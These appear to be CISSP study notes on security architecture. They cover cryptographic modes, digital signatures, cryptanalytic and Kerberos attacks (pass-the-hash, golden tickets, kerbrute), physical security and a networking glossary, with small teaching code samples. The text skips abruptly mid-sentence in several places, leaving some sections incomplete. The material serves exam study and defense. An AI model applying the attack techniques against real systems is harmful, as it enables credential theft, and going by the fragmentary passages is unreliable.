Note that FaaS is a subcategory of PaaS
Applications developed on serverless architecture are similar to microservices, and each function is
created to operate independently and autonomously
A serverless model, as in other CSP models, is a shared security model, and your org and the CSP
share security responsibility
3.5.12 Embedded systems
Embedded systems: any form of computing component added to an existing mechanical or electrical
system for the purpose of providing automation, remote control, and/or monitoring; usually including a
limited set of specific functions
Embedded systems can be a security risk because they are generally static, with admins having no
way to update or address security vulns (or vendors are slow to patch)
Embedded systems focus on minimizing cost and extraneous features
Embedded systems are often in control of/associated with physical systems, and can have real-
world impact
Securing embedded systems:
embedded systems should be isolated from the internet, and from a private production
network to minimize exposure to remote exploitation, remote control, and malware
use the secure boot feature and physically protect the hardware
3.5.13 High-Performance Computing systems
High-performance computing (HPC) systems: platforms designed to perform complex
calculations/data manipulation at extremely high speeds (e.g. supercomputers or MPP (Massively
Parallel Processing) systems); often used by large orgs, universities, or gov agencies
An HPC solution is composed of three main elements:
compute resources
network capabilities
storage capacity
HPCs often implement real-time OS (RTOS)
HPC systems are often rented, leased or shared, which can limit the effectiveness of firewalls and
invalidate air gap solutions
Securing HPC systems:
deploy head nodes and route all outside traffic through them, isolating parts of a system
"fingerprint" HPC systems to understand use, and detect anomalous behavior
and key lengths selected are sufficient to preserve the integrity of the cryptosystems for as long as
necessary -- to keep secret information safe
Specify the cryptographic algorithms (such as AES, 3DES, and RSA) acceptable for use in an organization
Identify the acceptable key lengths for use with each algorithm based on the sensitivity of the info
transmitted
Enumerate the secure transaction protocols (e.g. TLS) that may be used
As computing power goes up, the strength of cryptographic algorithms goes down; keep in mind the
effective life of a certificate or cert template, and of cryptographic systems
TLS uses an ephemeral symmetric session key between server and client, exchanged using asymmetric
cryptography; note that all content is protected using symmetric cryptography
Beyond brute force, consider things like the discovery of a bug or an issue with an algorithm or system
NIST defines the following terms that are commonly used to describe algorithms and key lengths:
approved (an algorithm that is specified as a NIST or FIPS recommendation)
acceptable (algorithm + key length is safe today)
deprecated (algorithm and key length is OK to use, but brings some risk)
restricted (use of the algorithm and/or key length is deprecated and should be avoided)
legacy (the algorithm and/or key length is outdated and should be avoided when possible)
disallowed (algorithm and/or key length is no longer allowed for the indicated use)
3.6.2 Cryptographic methods (e.g., symmetric, asymmetric, elliptic curves, quantum)
Symmetric encryption: uses the same key for encryption and decryption
symmetric encryption uses a shared secret key available to all users of the cryptosystem
symmetric encryption is faster than asymmetric encryption because smaller keys can be used for
the same level of protection
downside is that users or systems must find a way to securely share the key and hope the key is
used only for the specified communication
symmetric-key encryption can use either stream ciphers or block ciphers
primarily employed to perform bulk encryption and provides only for the security service of
confidentiality
"same" is a synonym for symmetric
"different" is a synonym for asymmetric
total number of keys required to completely connect n parties using symmetric cryptography is
given by this formula:
(n(n - 1)) / 2
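The formula can be checked with a short function; it also shows why symmetric key distribution scales poorly compared to asymmetric cryptography, where each party needs only one key pair regardless of peer count:

```python
def symmetric_keys(n):
    """Unique pairwise secret keys needed to fully connect n parties."""
    return n * (n - 1) // 2

# Symmetric key count grows quadratically; asymmetric needs just one
# key pair (2 keys) per party no matter how many peers they talk to.
for n in (5, 10, 100, 1000):
    print(f"{n:>5} parties: {symmetric_keys(n):>7} symmetric keys"
          f" vs {2 * n:>5} asymmetric keys")
```

For 1000 parties that is 499,500 shared secrets to distribute securely versus 2,000 asymmetric keys, which is the scalability advantage noted later in this section.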
symmetric cryptosystems operate in several discrete modes:
Electronic Code Book (ECB) mode: the simplest and weakest of the modes; each block of
plaintext is encrypted separately, but they are encrypted in the same way
advantages: fast, blocks can be processed simultaneously
disadvantages: any plaintext duplication would produce the same ciphertext
Cipher Block Chaining (CBC) mode: a block cipher mode of operation that encrypts
plaintext by using an operation called XOR (exclusive-OR); XORing a block with the previous
ciphertext block is known as "chaining"; this means that the decryption of a block of
ciphertext depends on all the preceding ciphertext blocks; CBC uses an Initialization Vector
or IV, which is a random value or nonce shared between sender and receiver
advantages: CBC uses the previous ciphertext block to encrypt the next plaintext
block, making it harder to deconstruct; XORing process prevents identical plaintext
from producing identical ciphertext; a single bit error in a ciphertext block affects the
decryption of that block and the next, making it harder for attackers to exploit errors
disadvantages: the blocks must be processed in order, not simultaneously (so it's
slower); CBC is also vulnerable to POODLE and GOLDENDOODLE attacks
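The difference between ECB and CBC chaining can be illustrated with a toy sketch. The "block cipher" below is a plain XOR with a fixed key, which is not a real cipher at all; it exists purely to show the mode structure, i.e. how chaining stops repeated plaintext blocks from producing repeated ciphertext:

```python
# Toy ECB-vs-CBC demonstration. The "cipher" is XOR with a fixed key --
# NOT secure, just enough to show the structural difference of the modes.
BLOCK = 4
KEY = bytes.fromhex("a1b2c3d4")

def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def ecb_encrypt(plaintext):
    blocks = [plaintext[i:i + BLOCK] for i in range(0, len(plaintext), BLOCK)]
    return [xor(b, KEY) for b in blocks]

def cbc_encrypt(plaintext, iv):
    blocks = [plaintext[i:i + BLOCK] for i in range(0, len(plaintext), BLOCK)]
    out, prev = [], iv
    for b in blocks:
        c = xor(xor(b, prev), KEY)  # chain: XOR with previous ciphertext first
        out.append(c)
        prev = c
    return out

msg = b"SAMESAMEDIFF"  # three blocks; the first two are identical
ecb = ecb_encrypt(msg)
cbc = cbc_encrypt(msg, iv=bytes.fromhex("00112233"))

print("ECB:", [c.hex() for c in ecb])  # repeated plaintext -> repeated ciphertext
print("CBC:", [c.hex() for c in cbc])  # chaining hides the repetition
```

With ECB the first two ciphertext blocks are identical, leaking structure; with CBC they differ because each block is XORed with the previous ciphertext before encryption.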
Cipher Feedback (CFB) mode: streaming version of CBC; similar to CBC, it uses an IV and
the cipher from the previous block so errors can propagate; the main difference is that with
CFB, the cipher from the previous block is encrypted first, then XORed with the current block
advantages: CFB is considered to be faster than CBC even though itʼs also sequential
disadvantages: if thereʼs an error in one block, it can carry over into the next block
Output Feedback (OFB) mode: OFB turns a block cipher into a synchronous stream cipher;
based on an IV and the key, it generates keystream blocks which are then simply XORed with
the plaintext data; as with CFB, the encryption and decryption processes are identical, and
no padding is required
advantages: the IV does not need to be kept secret (though it must never be reused with
the same key); a bit error in one ciphertext block does not propagate into later blocks
disadvantages: no data integrity protection, vulnerability to IV management/reuse issues,
and lack of parallelization capabilities due to the dependence of the keystream on
previous blocks
Counter (CTR) mode: key feature is that you can parallelize encryption and decryption, and
it doesnʼt require chaining; it uses a counter function to generate a nonce value for each
blockʼs encryption; the nonce number (aka the counter) gets encrypted and then XORed with
the plaintext to generate ciphertext; the resulting ciphertext should also always be unique
advantage: CTR mode is fast, and considered to be secure
disadvantage: lacks integrity, so we need to use hashing
Galois/Counter (GCM) mode: combines counter mode (CTR) encryption with Galois field
authentication; we can not only encrypt data but also authenticate where the data came
from (providing both data integrity and confidentiality); GCM also supports additional
authenticated data (AAD), which is authenticated but not encrypted
advantages: extremely fast, GCM is recognized by NIST and used in the IEEE 802.1AE
standard
disadvantages: most stated disadvantages seem to be around implementation
burdens
Counter with Cipher Block Chaining Message Authentication Code (CCM) mode: uses
counter mode for encryption, so there is no error propagation and no ciphertext
duplication; the CBC-based message authentication code (MAC) provides authentication
and integrity, but because it uses chaining it cannot run in parallel
advantages: no error propagation, provides authentication and integrity
disadvantages: cannot be run in parallel
Examples of symmetric algorithms: Twofish, Serpent, AES (Rijndael), Camellia, Salsa20,
ChaCha20, Blowfish, CAST5, Kuznyechik, RC4/5/6, DES, 3DES, Skipjack, Safer, and IDEA
Asymmetric encryption: process that uses different keys for encryption and decryption, and in which the
decryption key is computationally infeasible to determine given the encryption key itself
Asymmetric (AKA public key, since one key of a pair is available to anybody) algorithms provide
convenient key exchange mechanisms and are scalable to very large numbers of users (addressing
the two most significant challenges for users of symmetric cryptosystems)
Asymmetric cryptosystems avoid the challenge of sharing the same secret key between users, by
using pairs of public and private keys to allow secure communication without the overhead of
complex key distribution
Public key: one part of the matching key pair, which can be shared or published
Besides the public key, there is a private key that should remain private and protected
The security of an asymmetric encryption process is entirely dependent upon protecting the
secrecy and integrity of the private key
While asymmetric encryption is slower, it is best suited for sharing between two or more parties
Asymmetric encryption provides confidentiality, authentication and non-repudiation
Asymmetric key use:
m of n control: you designate a group of (n) people as recovery agents, but only need
subset (m) of them for key recovery
split custody: enables two or more people to share access to a key (e.g. two people
each hold half the password to the key)
Key rotation: rotate keys (retire old keys, implement new) to reduce the risks of a
compromised key having access
Key states:
suspension: temporary hold
revocation: permanently revoked
expiration
destruction
See NIST 800-57, Part 1
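The m-of-n recovery control above is commonly implemented with a secret-sharing scheme such as Shamir's; a minimal sketch (the `make_shares`/`recover` helpers and the toy prime field are illustrative assumptions, not a production implementation):

```python
import random

PRIME = 2**61 - 1  # Mersenne prime defining the field; big enough for a toy secret

def make_shares(secret: int, m: int, n: int):
    # Random polynomial of degree m-1 whose constant term is the secret;
    # each of the n recovery agents gets one point (x, f(x)) on the curve
    coeffs = [secret] + [random.randrange(PRIME) for _ in range(m - 1)]
    return [(x, sum(c * pow(x, i, PRIME) for i, c in enumerate(coeffs)) % PRIME)
            for x in range(1, n + 1)]

def recover(shares):
    # Lagrange interpolation at x = 0 rebuilds the constant term (the secret);
    # any m distinct shares suffice, and fewer than m reveal nothing
    secret = 0
    for xi, yi in shares:
        num, den = 1, 1
        for xj, _ in shares:
            if xj != xi:
                num = num * -xj % PRIME
                den = den * (xi - xj) % PRIME
        secret = (secret + yi * num * pow(den, -1, PRIME)) % PRIME
    return secret

shares = make_shares(secret=424242, m=3, n=5)
assert recover(shares[:3]) == 424242   # any 3 of the 5 shares recover the key
assert recover(shares[1:4]) == 424242
```

Any subset of m shares works because m points uniquely determine a degree m-1 polynomial.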
3.6.5 Digital signatures and digital certificates (e.g., non-repudiation, integrity)
Digital signatures: provide proof that a message originated from a particular user of a cryptosystem, and ensure that the message was not modified while in transit between two parties
Digital signatures rely on a combination of two major concepts — public key cryptography, and
hashing functions
Digitally signed messages assure the recipient that the message truly came from the claimed
sender, enforcing nonrepudiation
Digitally signed messages assure the recipient that the message was not altered while in transit;
protecting against both malicious modification (third party altering message meaning), and
unintentional modification (faults in the communication process)
Digital signature process does not provide confidentiality in and of itself (only ensures integrity,
authentication, and nonrepudiation)
To digitally sign a message, first use a hashing function to generate a message digest; then encrypt
the digest with your private key
To verify a digital signature, decrypt the signature with the sender's public key and compare the
message digest to the one you generate yourself: if they match, the message is authentic
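The hash-then-sign flow above can be sketched with textbook RSA (tiny illustrative primes, no padding; deliberately insecure, purely to show the mechanics — real signatures use the FIPS 186-5 algorithms with proper key sizes and padding):

```python
import hashlib

# Toy RSA key pair (illustrative primes only -- never use sizes like this)
p, q = 61, 53
n = p * q                  # public modulus
phi = (p - 1) * (q - 1)
e = 17                     # public exponent
d = pow(e, -1, phi)        # private exponent via modular inverse (Python 3.8+)

def sign(message: bytes) -> int:
    # Hash the message, then encrypt the digest with the PRIVATE key
    digest = int.from_bytes(hashlib.sha256(message).digest(), "big") % n
    return pow(digest, d, n)

def verify(message: bytes, signature: int) -> bool:
    # Decrypt the signature with the sender's PUBLIC key and compare digests
    digest = int.from_bytes(hashlib.sha256(message).digest(), "big") % n
    return pow(signature, e, n) == digest

sig = sign(b"wire $1000 to Alice")
assert verify(b"wire $1000 to Alice", sig)                # authentic: digests match
assert not verify(b"wire $1000 to Alice", (sig + 1) % n)  # tampered signature fails
```

Only the private-key holder can produce a signature that the public key validates, which is what gives the scheme its nonrepudiation property.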
FIPS 186-5 Digital Signature Standard (DSS) - specifies three techniques for the generation and
verification of digital signatures that can be used for the protection of data:
the Rivest-Shamir-Adleman Algorithm (RSA)
the Elliptic Curve Digital Signature Algorithm (ECDSA), and
the Edwards-Curve Digital Signature Algorithm (EdDSA)
NOTE: the Digital Signature Algorithm (DSA) is now to be used only for verifying existing signatures
3.7 Understand methods of cryptanalytic attacks (OSG-10 Chpts 7,14,21)
3.7.1 Brute force
Brute force: an attack that attempts every possible valid combination for a key or password
they involve using massive amounts of processing power to methodically guess the key used to
secure cryptographic communications
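As a toy illustration of the idea (a hypothetical 4-digit PIN protected only by an unsalted SHA-256 hash — a deliberately weak setup chosen so the search space is tiny):

```python
import hashlib

# Hypothetical target: an unsalted SHA-256 hash of a 4-digit PIN
target = hashlib.sha256(b"7391").hexdigest()

def brute_force_pin(target_hex: str):
    # Methodically try every possible PIN until the hash matches
    for pin in range(10000):
        candidate = f"{pin:04d}".encode()
        if hashlib.sha256(candidate).hexdigest() == target_hex:
            return candidate.decode()
    return None

assert brute_force_pin(target) == "7391"  # a 10,000-value keyspace falls instantly
```

The same loop against a 128-bit key would take longer than the age of the universe, which is why key length is the primary defense against brute force.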
3.7.2 Ciphertext only
Ciphertext only: an attack where you only have the encrypted ciphertext message at your disposal (not
the plaintext)
if you have enough ciphertext samples, the idea is that you can decrypt the target ciphertext based
on the samples
frequency analysis is a technique that is helpful against simple ciphers (see below)
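A minimal sketch of frequency analysis against a Caesar (shift) cipher — it assumes the most common ciphertext letter corresponds to 'e', the most frequent letter in English text:

```python
from collections import Counter

def caesar(text: str, shift: int) -> str:
    # Shift lowercase letters; leave everything else (spaces, etc.) untouched
    return "".join(chr((ord(c) - 97 + shift) % 26 + 97) if c.islower() else c
                   for c in text)

def crack_caesar(ciphertext: str) -> str:
    # Map the most frequent ciphertext letter to 'e' to estimate the shift
    top = Counter(c for c in ciphertext if c.islower()).most_common(1)[0][0]
    shift = (ord(top) - ord("e")) % 26
    return caesar(ciphertext, -shift)

plaintext = "meet me near the tree when the evening breeze settles"
assert crack_caesar(caesar(plaintext, 3)) == plaintext  # recovered with no key
```

This only works against simple substitution-style ciphers; modern ciphers produce ciphertext with flat letter frequencies.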
side-channel characteristics information are often combined together to try to break down the
cryptography
timing attack is an example
3.7.8 Fault-Injection
Fault-Injection: the attacker attempts to compromise the integrity of a cryptographic device by causing
some type of external fault
for example, using high-voltage electricity, high or low temperature, or other factors to cause a
malfunction that undermines the security of the device
3.7.9 Timing
Timing: timing attacks are an example of a side-channel attack where the attacker measures precisely
how long cryptographic operations take to complete, gaining information about the cryptographic
process that may be used to undermine its security
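A common defensive illustration: comparing secrets with ordinary equality short-circuits at the first mismatched byte, so response time leaks how much of a guess was correct; Python's stdlib `hmac.compare_digest` compares in constant time:

```python
import hmac

def naive_equal(a: bytes, b: bytes) -> bool:
    # Returns at the first differing byte -- runtime depends on how many
    # leading bytes match, which a timing attack can measure and exploit
    if len(a) != len(b):
        return False
    for x, y in zip(a, b):
        if x != y:
            return False
    return True

def safe_equal(a: bytes, b: bytes) -> bool:
    # Runtime is independent of where (or whether) the inputs differ
    return hmac.compare_digest(a, b)

assert safe_equal(b"s3cret-token", b"s3cret-token")
assert not safe_equal(b"s3cret-token", b"s3cret-tokeX")
```

Constant-time comparison is the standard countermeasure whenever secrets (MACs, tokens, password hashes) are checked against attacker-supplied input.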
3.7.10 Man-in-the-middle (MITM)
Man-in-the-middle (MITM) (AKA on-path, or Adversary-in-the-Middle (AitM)): in this attack a
malicious individual sits between two communicating parties and intercepts all communications (including
the setup of the cryptographic session)
attacker responds to the originator's initialization requests and sets up a secure session with the
originator
attacker then establishes a second secure session with the intended recipient using a different key
and posing as the originator
attacker can then "sit in the middle" of the communication and read all traffic as it passes between
the two parties
3.7.11 Pass the hash
Pass the hash (PtH): a technique where an attacker captures a password hash (as opposed to the
password characters) and then simply passes it through for authentication and potentially lateral access
to other networked systems
the threat actor doesnʼt need to decrypt the hash to obtain a plain text password
PtH attacks exploit the authentication protocol, as the password's hash remains static for every
session until the password is rotated
attackers commonly obtain hashes by scraping a system's active memory and other techniques
PtH attacks typically exploit NTLM vulns, but attackers also use similar attacks against other protocols,
including Kerberos
3.7.12 Kerberos exploitation
Overpass the Hash: alternative to the PtH attack, used when NTLM is disabled on the network (AKA
pass the key)
Pass the Ticket: in this attack, attackers attempt to harvest tickets held in the lsass.exe process
Silver Ticket: a silver ticket uses the captured NTLM hash of a service account to create a ticket-granting
service (TGS) ticket (the silver ticket grants the attacker all the privileges granted to the service account)
Golden Ticket: if an attacker obtains the hash of the Kerberos service account (KRBTGT), they can
create tickets at will within Active Directory (this provides so much power it is referred to as having a
golden ticket)
Kerberos Brute-Force: attackers use the Python script kerbrute.py on Linux, and Rubeus on Windows systems; these tools can guess usernames and passwords
ASREPRoast: ASREPRoast identifies users that donʼt have Kerberos preauthentication enabled
natural surveillance: any means to make criminals feel uneasy through increased
opportunities to be observed
walkways/stairways are open, open areas around entrances
areas should be well lit
natural territorial reinforcement: attempt to make the area feel like an inclusive, caring
community
Overall goal is to deter unauthorized people from gaining access to a location (or a secure portion), prevent unauthorized personnel from hiding inside or around the location, and prevent unauthorized personnel from committing crime
There are several smaller activities tied to site and facility design, such as upkeep and maintenance: if
property is run down or appears to be in disrepair, it gives attackers the impression that they can act with
impunity on the property
3.9 Design site and facility security controls (OSG-10 Chpt 10)
Note that although the topics in this section cover mostly interior spaces, physical security is applicable to both
interior and exterior of a facility
3.9.1 Wiring closets/intermediate distribution frame
Wiring closets/intermediate distribution frame (IDF): A wiring closet or IDF is typically the smallest room that holds IT hardware
wiring closet is AKA premises wire distribution room, main distribution frame (MDF), intermediate
distribution frame (IDF), and telecommunications room, and it is referred to as an IDF in (ISC)^2
CISSP objective 3.9.1
where networking cables for the building or a floor are connected to equipment (e.g. patch panels,
switches, routers, LAN extenders etc)
usually includes telephony and network devices, alarm systems, circuit breaker panels, punch-
down blocks, WAPs, video/security
may include a small number of servers
access to the wiring closet/IDF should be restricted to authorized personnel responsible for managing the IT hardware
use door access control (e.g. electronic badge system or electronic combination lock)
from a layout perspective, wiring closets should be accessible only in private areas of the building interiors; people must pass through a visitor center and a controlled doorway prior to being able to enter a wiring closet
3.9.2 Server rooms/data centers
Server rooms/data centers: server rooms, data centers, communication rooms, server vaults, and IT
closets are enclosed, restricted, and protected rooms where mission critical servers and networks are
housed
a server room is a bigger version of a wiring closet, but much smaller than a data center
a server room typically houses network equipment, backup infrastructure and servers (more
archaic versions include telephony equipment)
server rooms should be designed to support optimal operation of IT infrastructure and to block
unauthorized human access or intervention
server rooms should be located at the core of the building (avoid ground floor, top floor, or in the
basement)
server rooms should have a single entrance (and an emergency exit)
server room should block unauthorized access, and entries and exits should be logged
datacenters are usually more protected than server rooms, and can include guards and mantraps
Class B: liquids
Class C: electrical
Class D: combustible metals
Class K: cooking material (oil/grease)
Four main types of suppression:
wet pipe system (AKA closed head system): always filled with water; water discharges immediately when suppression is triggered
dry pipe system: pipes contain compressed inert gas; water is held back by a valve and released into the pipes when suppression is triggered
pre-action system: a variation of the dry pipe system that uses a two-stage detection and release
mechanism
deluge system: uses larger pipes and delivers larger volume of water
Note: Most sprinkler heads feature a glass bulb filled with a glycerin-based liquid; this liquid expands when it comes in contact with air heated to between 135 and 165 degrees Fahrenheit; when the liquid expands, it shatters its glass confines and the sprinkler head activates
3.9.9 Power (e.g., redundant, backup)
Consider designing power to provide for high availability
Most power systems have to be tested at regular intervals
As part of the design, mandate redundant power systems to accommodate testing, upgrades and other
maintenance
Additionally, test failover to a redundant power system and ensure it is fully functional
The InterNational Electrical Testing Association (NETA) has developed standards around testing power systems
Battery backup/fail-over power (including UPS/generators):
this is a system that collects power into a battery but can switch over to pulling power from the
battery when the power grid fails
generally, this type of system is implemented to supply power to an entire building rather than just one or a few devices
3.10 Manage the information system lifecycle (OSG-10 Chpt 10)
The Information System Lifecycle: the entire lifespan of a system, from initial concept to eventual
decommission, which includes the components below. Note that this Information System lifecycle is very similar
(with the exception of integration) to the Software Development Lifecycle (SDLC):
Initiation/Requirements
Architecture & Design
Development
Testing (note verification and validation are part of testing)
Release/Deployment
Operations/Maintenance
3.10.1 Stakeholders needs and requirements
Focused on understanding stakeholder needs and expectations, this initial phase is about ensuring the
new system will meet the needs of the people that use it, and that there is a communicated and agreed
upon understanding of those requirements
3.10.2 Requirements analysis
This is a detailed analysis of the functional and nonfunctional requirements, ensuring that goals of the
system and the organization are in alignment, as well as an analysis of the requirements to understand
any associated risks
ARP: Address Resolution Protocol; used to resolve IP addresses into Media Access Control (MAC) addresses;
provides for direct communication between two devices within the same LAN segment
ARP poisoning: AKA ARP spoofing, where an attacker sends malicious ARP messages to a local network with
the goal of associating the attackerʼs MAC address with the IP address of another device (typically the default
gateway or another trusted device) in the network; once successful, the attacker can intercept, modify, or block
data intended for that IP address, facilitating attacks like man-in-the-middle (MITM), eavesdropping, or denial of
service (DoS)
APT: Advanced Persistent Threat is an agent/org that plans, organizes, and carries out highly sophisticated
attacks against a target person, org, or industry over a period of time (months or even years); usually with a
strategic goal in mind
API: Application Programming Interface; code mechanisms that provide ways for apps to share data, methods,
or functions over a network (usually implemented in XML or JavaScript Object Notation (JSON))
Automatic Private IP Addressing (APIPA): acts as a failover mechanism for DHCP servers and makes it easier
to configure and support small LANs; primarily used in situations where a DHCP server is not available or is not
responding; APIPA address range is 169.254.0.0–169.254.255.255, with the subnet mask of 255.255.0.0 (/16)
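Python's stdlib `ipaddress` module exposes this range directly (`is_link_local` covers 169.254.0.0/16), which makes APIPA addresses easy to spot in logs or scripts:

```python
import ipaddress

def is_apipa(addr: str) -> bool:
    # APIPA addresses are the IPv4 link-local range 169.254.0.0/16
    return ipaddress.ip_address(addr).is_link_local

assert is_apipa("169.254.10.20")     # self-assigned: DHCP likely failed
assert not is_apipa("192.168.1.20")  # normal private address
```

An APIPA address on a client is a useful troubleshooting signal that the DHCP server was unreachable.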
Bandwidth: amount of information transmitted over a period of time; can be applied to moving bits over a
medium, or human processes like learning or education
Baseband Communication: refers to the transmission of a single signal over a medium using its original
frequencies (without modulation), and the entire bandwidth of the medium is used to carry the signal; ethernet
networks (like 10BASE-T) operate using baseband signaling, where the entire cable is dedicated to a single
communication channel
Bluebugging: a type of Bluetooth attack where an attacker exploits vulnerabilities in a device's Bluetooth
connection to gain unauthorized access and control over it; the attacker can then use this access to listen to
phone calls, read or send messages, steal data, or even manipulate the deviceʼs settings, all without the victim's
knowledge; to combat this attack, turn off Bluetooth when not in use, set to "non-discoverable", and use strong
authentication
Bluejacking: a relatively harmless Bluetooth-based attack where an attacker sends unsolicited messages to
nearby Bluetooth-enabled devices, such as mobile phones, tablets, or laptops; it exploits the Bluetooth feature
that allows devices to communicate over short distances (typically up to 10 meters) and works by pushing
messages to any device with Bluetooth set to "discoverable" mode
Bluesnarfing: Bluesnarfing is a Bluetooth-based attack where an attacker gains unauthorized access to data on
a victim's Bluetooth-enabled device; unlike Bluejacking (which only sends unsolicited messages), bluesnarfing
is a serious security threat because it involves stealing or retrieving sensitive data without the user's knowledge
or consent
Bluesniffing: Bluesniffing is a type of Bluetooth attack that involves eavesdropping on Bluetooth
communications to intercept data being exchanged between devices; itʼs a form of passive Bluetooth
reconnaissance where the attacker attempts to listen in on Bluetooth signals to gather information, much like
Wi-Fi sniffing attacks on wireless networks
Bound networks: AKA wired/Ethernet networks, where devices are connected by physical cables
Boundary routers: they advertise routes that external hosts can use to reach internal hosts
Broadband: refers to the transmission of multiple signals over a single communication medium using different
frequency ranges (via modulation); it allows simultaneous transmission of multiple channels or services;
policy for handling unauthenticated emails, such as quarantine or reject, and to receive reports on email
authentication results; DMARC works by checking that the "From" address matches the domain in the SPF and
DKIM checks (alignment)
DomainKeys Identified Mail (DKIM): an email authentication protocol that helps verify the authenticity of an
email sender and ensure message integrity; DKIM works by attaching a digital signature to the email header,
which is created using a private key known only to the sender's email server; the recipientʼs email server uses
the senderʼs public key, stored in DNS records, to verify this signature; if the signature is valid, it confirms the
email was sent from an authorized source and hasn't been altered in transit helping prevent email spoofing and
phishing by allowing recipients to verify that emails truly come from trusted domains
DNS: Domain Name Service is three interrelated elements: a service, a physical server, and a network protocol
DNS poisoning: act of falsifying DNS info used by clients to reach a system; can be accomplished via a rogue
DNS server, pharming, altering a hosts file, corrupting IP config, DNS query spoofing, and proxy falsification;
examples:
HOSTS poisoning
authorized DNS server attack
caching DNS server attack
changing a DNS server address
DNS query spoofing
Domain hijacking: or domain theft, is the malicious action of changing the registration of a domain name
without the authorization of the owner
Extranet: a private network similar to an intranet, but typically open to external parties, such as business
partners, suppliers, key customers, etc; main purpose of an extranet is to allow users to exchange data and
applications, and share information
Extensible Authentication Protocol (EAP): a framework that allows for various authentication methods to be
used for secure network access, including wireless networks, by providing a standardized way to exchange
authentication information between a client and an authentication server; it's not a specific authentication
method itself, but a platform to support multiple methods like passwords, certificates, or smart cards depending
on the chosen "EAP method"; EAP allows customized authentication security solutions
Email bombing: AKA "mail-bombing" - when email itself is used as an attack mechanism by flooding a system
with messages, causing a denial of service
Email security: internet email is based on SMTP, POP3, and IMAP, and is inherently insecure; email can be
secured, and the methods used must be addressed in a security policy; email security solutions include using
S/MIME, PGP, DKIM, SPF, DMARC, STARTTLS, and Implicit SMTPS
EPP: endpoint protection platform (EPP) is a variation of EDR; EPP focuses on four main security functions:
predict, prevent, detect, and respond; EPP is the more active predict and prevent variation of the more passive
EDR
Evil twin: a type of Wi-Fi attack where a malicious actor sets up a fake wireless access point (AP) that mimics a
legitimate one, with the goal of tricking users into connecting to the rogue access point, allowing the attacker to
intercept, monitor, and manipulate the victimʼs network traffic, potentially capturing sensitive data such as login
credentials, financial info, and personal communications
FDDI: Fiber Distributed Data Interface is an ANSI X3T9.5 LAN standard; 100 Mbps, token-passing using fiber-
optic, up to 2 kilometers
FCoE: Fibre Channel over Ethernet is a lightweight encapsulation protocol without the reliable data transport of TCP
Gateway device: a firewall or other device that sits at the edge of the network to regulate traffic and enforce
rules
Generic Routing Encapsulation (GRE): a protocol for encapsulating data packets that use one routing protocol
inside the packets of another protocol; "encapsulating" means wrapping one data packet within another data
packet, like putting a box inside another box; encapsulation is the addition of a header, possibly footer, to the
data received by each layer from the layer above before handing it off to the layer below; the inverse action is
de-encapsulation; note that when using IPv4, the GRE header is inserted between the delivery and payload
headers
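The box-in-a-box idea can be sketched with the 4-byte base GRE header from RFC 2784 (a flags/version word plus an EtherType-style protocol type); the helper names are illustrative:

```python
import struct

def gre_encapsulate(payload: bytes, proto_type: int) -> bytes:
    # Base GRE header (RFC 2784): 16 bits of flags/version (all zero here)
    # followed by a 16-bit protocol type identifying the inner payload
    return struct.pack("!HH", 0, proto_type) + payload

def gre_decapsulate(packet: bytes):
    # Strip the header off again: the inverse operation (de-encapsulation)
    flags_version, proto_type = struct.unpack("!HH", packet[:4])
    return proto_type, packet[4:]

inner = b"\x45\x00..."  # stand-in for an inner IPv4 packet
proto, payload = gre_decapsulate(gre_encapsulate(inner, 0x0800))  # 0x0800 = IPv4
assert proto == 0x0800 and payload == inner
```

Real GRE headers may also carry optional checksum and key fields when the corresponding flag bits are set.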
Host-based IDS (HIDS): monitor activity on a single system; one drawback of a HIDS is that attackers can
discover and disable them (compare to NIDS)
Hypervisor: aka virtual machine monitor/manager (VMM); the virtualization component that creates, manages,
and operates VMs
Hypervisor Type I: a native or bare-metal hypervisor; there is no host OS, the hypervisor installs directly onto
the hardware instead of the host OS
Hypervisor Type II: a hosted hypervisor; the hypervisor is installed as another app in the OS
ICMP: Internet Control Message Protocol, standardized by IETF via RFC 792 to determine if a particular host is
available
IGMP: Internet Group Management Protocol, used to manage multicasting groups
Implicit SMTPS: a method of securing email transmission by establishing a dedicated, encrypted connection
using TLS (Transport Layer Security) from the start, typically over port 465; unlike STARTTLS, which begins as
an unencrypted connection and then upgrades, Implicit SMTPS immediately initiates a secure connection,
making it less vulnerable to interception or downgrade attacks
Internetworking: two different sets of servers/communication elements using network protocol stacks to
communicate and coordinate activities
International Telecommunication Union Telecommunication Standardization Sector (ITU-T): responsible
for setting international standards for telecommunications and Information Communication Technology (ICT);
standards include X.509, Y.3172 and Y.3173 (machine learning), H.264/MPEG-4 AVC (video compression), and
ITU-T G.651.1 (multimode fiber)
IV (Initialization Vector) attack: occurs when attackers exploit weaknesses in how an IV is generated or used
in cryptographic systems, particularly in stream ciphers and certain modes of block ciphers; the Initialization
Vector (IV) is a random or pseudo-random value used to ensure that even if the same data is encrypted multiple
times, the resulting ciphertext is different each time; if the IV is predictable, reused, or improperly managed, it
can lead to security vulnerabilities, enabling attackers to decrypt data, tamper with messages, or perform replay
attacks
Layer 2 Tunneling Protocol (L2TP): a VPN tunneling protocol used to establish secure connections over public
networks by creating a virtual tunnel for data; L2TP itself does not provide encryption, so it is often paired with
IPsec (L2TP/IPsec) to provide confidentiality, integrity, and authentication; it operates at Layer 2 (Data Link
Layer) of the OSI model, encapsulating data for secure transmission, commonly used for remote access VPNs
and site-to-site connections
LDAP: lightweight directory access protocol uses simple (basic) authentication such as SSL/TLS, or SASL
(Simple Authentication and Security Layer)
Load balancers: used to spread or distribute network traffic load across several network links or devices, with
the purpose of optimizing infrastructure utilization, minimize response time, maximize throughput, reduce
overloading, and remove bottlenecks
MAC filtering: a list of authorized wireless client interface MAC addresses used by a WAP to block access to all nonauthorized devices
Managed Detection and Response (MDR): a service that monitors an IT environment in real-time to detect
and resolve threats; not limited to endpoints, MDR focuses on threat detection and mediation; often a
combination and integration of numerous technologies, such as SIEM, network traffic analysis (NTA), EDR, and
IDS
Microsegmentation: part of a zero trust strategy that breaks or divides up an internal network into very small
(sometimes as small as a single device or important server/end-point), highly localized zones; each zone is
separated from others by internal segmentation firewalls (ISFWs), subnets, or VLANs; note that at the limit, this
places a firewall at every connection point
MSSP: managed security service provider (MSSP) provides centrally-controlled and managed XDR solutions;
can be fully deployed on-premise, in the cloud, or hybrid; MSSP solutions can be overseen through a SOC which
is itself local or remote; orgs working with an MSSP to provide EDR, MDR, EPP, or XDR leverages the experience
and expertise of the MSSP's staff
Network Address Translation (NAT): NAT translates IP addresses without changing port information, via one-
to-one (static NAT) or many-to-one (dynamic NAT); NAT protects the addressing scheme of a private network,
